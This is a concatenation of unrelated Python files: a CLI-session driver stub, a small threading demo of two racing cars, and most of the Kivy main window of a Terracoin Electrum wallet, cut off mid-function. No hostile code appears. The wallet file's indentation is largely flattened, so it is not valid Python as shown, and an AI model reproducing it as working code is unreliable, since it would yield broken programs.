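# binary name 'my-cli' is a hypothetical placeholder for any interactive CLI
# that accepts ';'-terminated queries on stdin. Text mode and line buffering
# are needed because __enqueue_output() iterates readline() against the ''
# sentinel, and do() relies on the trailing newline to flush each query.
if __name__ == '__main__':
    import subprocess
    import time

    proc = subprocess.Popen(
        ['my-cli'],                   # hypothetical interactive CLI
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        universal_newlines=True,      # line-oriented text I/O
        bufsize=1,                    # line-buffered
    )
    session = CliSession(proc)
    session.do('show databases')
    time.sleep(1)                     # give the CLI a moment to answer
    print(session.last_output())
    if session.has_errors():
        print(session.last_error())
    session.close()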
|
threads.py
|
import time
from threading import Thread
def carro(velocidade, piloto):
    # Simulate a car: advance the distance travelled ("trajeto") by the given
    # speed ("velocidade") every half second until 100 km are covered,
    # printing the driver's ("piloto") progress at each step.
    trajeto = 0
    while trajeto <= 100:
        trajeto += velocidade
        time.sleep(0.5)
        print('Piloto: {} Km: {} \n'.format(piloto, trajeto))
t_carro1 = Thread(target=carro, args=[1, 'Mauricio'])
t_carro2 = Thread(target=carro, args=[2, 'Python'])
t_carro1.start()
t_carro2.start()
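# Optional addition (not in the original script): join() blocks the main
# thread until both "cars" have covered the full 100 km, so the program
# only exits after every progress line has been printed.
t_carro1.join()
t_carro2.join()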
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from electrum_trc.bitcoin import TYPE_ADDRESS
from electrum_trc.storage import WalletStorage
from electrum_trc.wallet import Wallet, InternalAddressCorruption
from electrum_trc.paymentrequest import InvoiceStore
from electrum_trc.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum_trc.plugin import run_hook
from electrum_trc.util import format_satoshis, format_satoshis_plain, format_fee_satoshis
from electrum_trc.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from electrum_trc import blockchain
from electrum_trc.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_trc.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_trc.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_trc.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_trc.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# Register a widget cache to keep memory usage down; timeout=0 keeps
# the cached data forever.
Cache.register('electrum_trc_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_trc.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum_trc/gui/kivy/data/fonts/Roboto.ttf',
'electrum_trc/gui/kivy/data/fonts/Roboto.ttf',
'electrum_trc/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum_trc/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_trc.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
ATLAS_ICON = 'atlas://electrum_trc/gui/kivy/theming/light/%s'
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
tor_auto_on = BooleanProperty()
def toggle_tor_auto_on(self, x):
self.tor_auto_on = not self.electrum_config.get('tor_auto_on', True)
self.electrum_config.set_key('tor_auto_on', self.tor_auto_on, True)
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum_trc import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'terracoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
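    # Worked example (illustrative, values assumed): if decimal_point() is 8,
    # get_amount('1.5 ' + self.base_unit) == int(10**8 * Decimal('1.5')) == 150000000,
    # i.e. user-entered amounts are converted to the smallest on-chain unit before use.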
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''Orientation of the device screen.
    Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read only `AliasProperty`. Defaults to 'landscape'.
    '''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read only `AliasProperty`. Defaults to 'phone'.
    '''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
App.__init__(self)#, **kwargs)
title = _('Terracoin Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
self.tor_auto_on = self.electrum_config.get('tor_auto_on', True)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._terracoin_net_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_trc.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('terracoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum_trc.transaction import Transaction
from electrum_trc.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum_trc.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum_trc/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum_trc.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum_trc/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.terracoin.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum_trc/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
        Logger.info('Time to on_start: {} <<<<<<<<'.format(time.perf_counter()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for terracoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated',
'blockchain_updated', 'status', 'new_transaction',
'verified', 'verified-islock']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
if self.network.tor_auto_on and not self.network.tor_on:
self.show_tor_warning()
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def show_tor_warning(self):
from kivy.uix.button import Button
from kivy.uix.image import Image
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.gridlayout import GridLayout
docs_uri = self.network.tor_docs_uri
def on_docs_press(a):
import webbrowser
webbrowser.open(docs_uri)
warn_box = GridLayout(rows=4, padding=20, spacing=20)
popup = Popup(title='Warning', title_align='center',
content=warn_box, auto_dismiss=False)
img_error = 'atlas://electrum_trc/gui/kivy/theming/light/error'
warn_box.add_widget(Image(source=img_error, size_hint_y=0.1))
warn_box.add_widget(Label(text=self.network.tor_warn_msg,
text_size=(Window.size[0]-40-32, None)))
docs_btn = Button(text=self.network.tor_docs_title, size_hint_y=0.1)
warn_box.add_widget(docs_btn)
dismiss_btn = Button(text=_('Close'), size_hint_y=0.1)
warn_box.add_widget(dismiss_btn)
dismiss_btn.bind(on_press=popup.dismiss)
docs_btn.bind(on_press=on_docs_press)
popup.open()
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage):
if storage:
wallet = Wallet(storage)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
        if storage and getattr(wallet.storage, 'backup_message', None):
            self.show_info(wallet.storage.backup_message)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
storage = WalletStorage(path, manual_upgrades=True)
if not storage.file_exists():
wizard.run('new')
elif storage.is_encrypted():
raise Exception("Kivy GUI does not support encrypted wallet files.")
elif storage.requires_upgrade():
wizard.upgrade_storage(storage)
else:
raise Exception("unexpected storage file situation")
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def terracoin_net_dialog(self):
from .uix.dialogs.terracoin_net import TerracoinNetDialog
if self._terracoin_net_dialog is None:
self._terracoin_net_dialog = TerracoinNetDialog(self)
self._terracoin_net_dialog.update()
self._terracoin_net_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'terracoin_net':
self.terracoin_net_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum_trc/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum_trc/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_trc.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_trc.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_trc_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_trc_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
if self.testnet:
self.icon = 'electrum_trc/gui/icons/electrum-trc-testnet.png'
else:
self.icon = 'electrum_trc/gui/icons/electrum-trc.png'
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
elif event == 'verified-islock':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum_trc.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sats/kB
return format_fee_satoshis(fee_rate) + ' sats/kB'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Terracoin Electrum', message,
app_icon=icon, app_name='Terracoin Electrum')
except ImportError:
            Logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
@property
def testnet(self):
return self.electrum_config.get('testnet')
@property
def app_icon(self):
return ATLAS_ICON % ('logo-testnet' if self.testnet else 'logo')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
if self.network:
self.network.stop()
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.network:
self.network.start([self.fx.run])
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum_trc/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum_trc/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum_trc/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
